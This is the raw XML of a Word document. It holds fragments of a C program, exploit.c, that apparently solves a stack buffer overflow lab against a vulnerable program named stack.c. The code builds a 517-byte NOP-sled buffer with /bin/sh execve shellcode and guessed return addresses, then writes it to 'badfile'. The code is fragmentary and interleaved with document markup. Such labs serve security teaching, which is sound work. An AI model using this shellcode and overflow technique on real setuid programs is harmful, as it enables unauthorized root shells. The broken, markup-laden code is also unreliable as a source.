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95" w:rsidRDefault="006873CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="375DB932" wp14:editId="6431856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B" w:rsidRDefault="0065704B"/>
    <w:p w:rsidR="0065704B" w:rsidRDefault="0065704B"/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/*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exploit.c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/* A program that creates a file containing code for launching shell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stdlib.h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stdio.h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#include &lt;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string.h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shellcode[]=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"\x31\xc0"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xorl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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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,%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eax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"\x50"    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pushl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eax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"\x68""//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sh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pushl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$0x68732f2f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"\x68""/bin"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pushl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$0x6e69622f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"\x89\xe3"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movl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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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,%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ebx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"\x50"    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pushl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eax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"\x53"    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pushl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ebx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"\x89\xe1"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movl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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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,%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ecx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"\x99"    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cdql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"\xb0\x0b"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movb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$0x0b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,%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al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"\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xcd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\x80"         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$0x80                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/* Function that calls an assembly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instuction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to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return the address of the top of the stack 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unsigned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long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get_sp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(void)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__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asm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_(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movl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esp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,%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eax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void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argc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 char **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argv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buffer[517];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FILE *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Initialize buffer with 0x90 (NOP instruction)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memset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&amp;buffer, 0x90, 517);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need to fill the buffer with appropriate contents here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Pointer to buffer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char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Long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handle a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sucession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addresses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long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addrptr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Address to land us in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stack.c's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function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order to overwrite the return and send us to the exploit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long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a position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, used to place shell code plus null at end of buffer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sizeof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(buffer) - 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sizeof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(shellcode) + 1);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argv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was used as an attempt to guess the stack pointer offset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at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runtime. This approach was not successful, it drastically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changes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address of the return we want to overwrite in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stack.c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offset =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argv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1];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Grab the address of the start of buffer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buffer;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Cast the address into a long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addrptr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(long*)(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buffaddr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%11x\n",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get_buffaddr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(buffer));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address refers to an address inside of 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stack.c's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function. The address was determined as a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initializing x to 0 in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stack.'s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bif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function and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printing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its address with a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statement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0xbffff362;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Alternative, correct approach that required us taking an educated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guess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what the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offest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should be in order to land in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stack.c's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bof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function.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get_sp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() + 500;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Addresses printed out for orientation, confirmation of process.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"stack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0x%x\n",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get_sp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0x%x\n",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0x%x\n",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get_sp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() + 502);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"buffer: 0x%x\n", buffer);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printf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"shellcode size: %d\n",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sizeof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(shellcode));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/* Fill the first 20 words of the buffer with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20;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*(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addrptr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++) =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retaddr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Fill the end of buffer with our shellcode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sizeof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(shellcode);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++) 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buffer[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] = shellcode[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Null terminate our shellcode at end of buffer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buffer[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sizeof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(buffer) - 1] = '\0';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/* Save the contents to the file "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 */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fopen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("./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", "w");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fwrite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buffer, 517, 1, </w:t>
      </w:r>
      <w:proofErr w:type="spell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fclose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badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5704B" w:rsidRPr="0065704B" w:rsidRDefault="0065704B" w:rsidP="0065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704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5704B" w:rsidRDefault="0065704B">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0065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CF"/>
    <w:rsid w:val="00561895"/>
    <w:rsid w:val="0065704B"/>
    <w:rsid w:val="0068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E174-636A-463F-B351-9227A022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Xu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Frank Xu</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-10-14T23:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-04T18:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>